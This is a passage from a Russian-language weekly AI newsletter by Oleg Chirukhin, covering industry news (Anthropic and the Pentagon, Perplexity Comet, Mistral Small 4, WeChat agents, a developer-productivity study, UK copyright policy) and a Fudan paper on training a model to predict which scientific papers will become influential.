И цитата Хуанга, которая идеально ложится в контекст. Его спросили про безопасность AI. Ответ: «Пугать всех научно-фантастической версией AI — это немного высокомерно». Прямой ответ на нарратив Anthropic — компании, которую Пентагон на той же неделе назвал «риском для цепочки поставок» именно за заботу о безопасности. Дженсен Хуанг — человек в кожаной куртке — говорит: хватит бояться, давайте строить. Anthropic говорит: давайте строить осторожно, вот наши красные линии. Пентагон говорит: ваши красные линии — угроза. Три позиции, одна неделя, нулевой консенсус.

Perplexity выпустила Comet — AI-браузер для iPhone. Агентный браузер: AI-ассистент, встроенный в каждую страницу, который может суммаризировать, сравнивать цены, заполнять формы, бронировать. На десктопе Comet стоил двести долларов в месяц. На iOS — бесплатно. Ещё один сигнал, что агентный браузинг — отдельная продуктовая категория. OpenAI строит Atlas, Google интегрирует Gemini в Chrome, Perplexity запускает Comet. Браузер становится следующей площадкой для агентов.

Mistral Small 4 — одна модель вместо трёх. Сто девятнадцать миллиардов параметров, Mixture-of-Experts, шесть миллиардов активных на токен. Apache 2.0 — полностью open source. Контекст двести пятьдесят шесть тысяч токенов. Ключевая фича — настраиваемая глубина рассуждений. Параметр reasoning_effort на каждый запрос: none — быстрый ответ в стиле чата, high — глубокий chain-of-thought. Одна модель заменяет три деплоя: Magistral для рассуждений, Pixtral для мультимодальности, Devstral для кодинга. Для тех, кто строит self-hosted агентные пайплайны и устал маршрутизировать между быстрой и думающей моделью — конкретное упрощение. Один эндпоинт, разное поведение. Ценник: пятнадцать центов за миллион входных токенов. Для self-hosted — ноль, только железо. Веса на Hugging Face, двести сорок два гигабайта.

Tencent: AI-агенты идут в WeChat. На earnings call восемнадцатого марта президент Tencent Мартин Лау подтвердил: компания строит AI-агента внутри WeChat. Полтора миллиарда пользователей. Агенты, вызывающие такси, бронирующие рестораны, управляющие задачами — всё через мини-программы WeChat. Запуск — возможно уже в апреле, если хватит вычислительных мощностей. Для разработчиков за пределами Китая — скорее контекст, чем руководство к действию. Но масштаб стоит держать в голове: если интеграция агентов в WeChat запустится, это будет самое крупное развёртывание агентного AI в истории.

Jellyfish: двадцать миллионов pull requests и парадокс продуктивности. Самое масштабное количественное исследование влияния AI на разработку: семьсот с лишним компаний, двести тысяч инженеров, двадцать миллионов pull requests. Шестьдесят четыре процента компаний генерируют большинство кода с AI-помощью. Лидеры по внедрению — двукратная пропускная способность.

Но совместное исследование с Harvard Economics показывает парадокс продуктивности: скорость растёт, а бизнес-результаты — нет. В сильно распределённых кодовых базах корреляция между внедрением AI и пропускной способностью вообще стремится к нулю. Вывод: контекст — узкое место. AI ускоряет написание кода, но ограничивающий фактор — понимание кодовой базы. И этот фактор AI пока не снимает.

Для тех, кого CEO спрашивает «а какой ROI от наших AI-инструментов» — вот данные. Скорость — да. Бизнес-результат — сложный вопрос.

UK copyright. Британское правительство опубликовало стодвадцатипятистраничный отчёт о копирайте и AI. Суть: они планировали легализовать обучение на защищённых авторским правом данных с возможностью opt-out для правообладателей. Творческие индустрии ответили настолько единодушным «нет», что правительство официально написало: «у нас больше нет предпочтительного варианта». Первое крупное правительство, которое отступило от разрешительного подхода. Для тех, кто задаётся вопросом «имеет ли кто-то право обучить модель на моём коде» — направление ветра меняется.

Научпоп-финал: может ли AI развить вкус?

Напоследок — история за пределами инструментов и бизнеса. Вопрос, который звучит почти абсурдно: можно ли научить нейросеть вкусу?

Не правильному ответу — с этим LLM уже справляются. И не хорошему коду — это бенчмарки решают. Вкусу: способности отличить перспективную научную идею от проходной. Работу, которая изменит поле через пять лет — от работы, которую никто не процитирует.

Группа из Университета Фудань (Шанхай) опубликовала на arXiv работу «AI Can Learn Scientific Taste». Два миллиона сто тысяч статей с arXiv. Семьсот тысяч пар: «эта статья стала влиятельной» vs «эта — нет», с цитированиями в качестве сигнала. Обучение через RLCF — Reinforcement Learning from Community Feedback. Не от экспертов, не от рецензентов — от сообщества: цитирования как сигнал вознаграждения.

Результат: их Scientific Judge обогнал GPT-5.2 и Gemini 3 Pro в предсказании влиятельности статей. И — что важнее — обобщается между научными областями и временными периодами. Модель, обученная на физике, предсказывает влиятельные работы в биологии. Модель, обученная на старых статьях, предсказывает значимость новых.

Для data scientists: дизайн сигнала вознаграждения здесь нетривиальный. Цитирования — шумный сигнал: есть обзорные статьи с тысячами цитирований и прорывные работы, которые по-настоящему оценили через десять лет. То, что RLCF с таким шумным сигналом работает — само по себе результат.

Но меня здесь интересует философский слой. Мы весь выпуск говорили про AI, который делает вещи: пишет код, ищет баги, платит за сэндвичи, спорит с Пентагоном. Всё это — исполнение. «AI Can Learn Scientific Taste» — про другое. Про суждение. Не «что делать», а «что стоит делать». Не исполнение, а курирование.

Если это масштабируется — меняется не только то, как мы делаем науку. Меняется кто решает, какая наука стоит того, чтобы её делать. Грантовые комитеты, рецензенты журналов, программные комитеты конференций — все они занимаются, по сути, предсказанием значимости. И модель из Шанхая утверждает, что делает это лучше.

Маленькие стежки, укрепляющие ядро. Код, который ждал двадцать семь лет. Телефонная компания с фронтирной моделью. Глава AI-безопасности, которая не может защитить свой почтовый ящик. И нейросеть, которая учится отличать хорошую науку от проходной.

Неплохая неделя. Меня зовут Олег Чирухин. Спасибо, что читаете.

Xiaomi MiMo Hunter Alpha Stripe MPP HTTP 402 Anthropic Pentagon Sashiko Linux kernel AI agents AI safety DeepSeek NVIDIA H200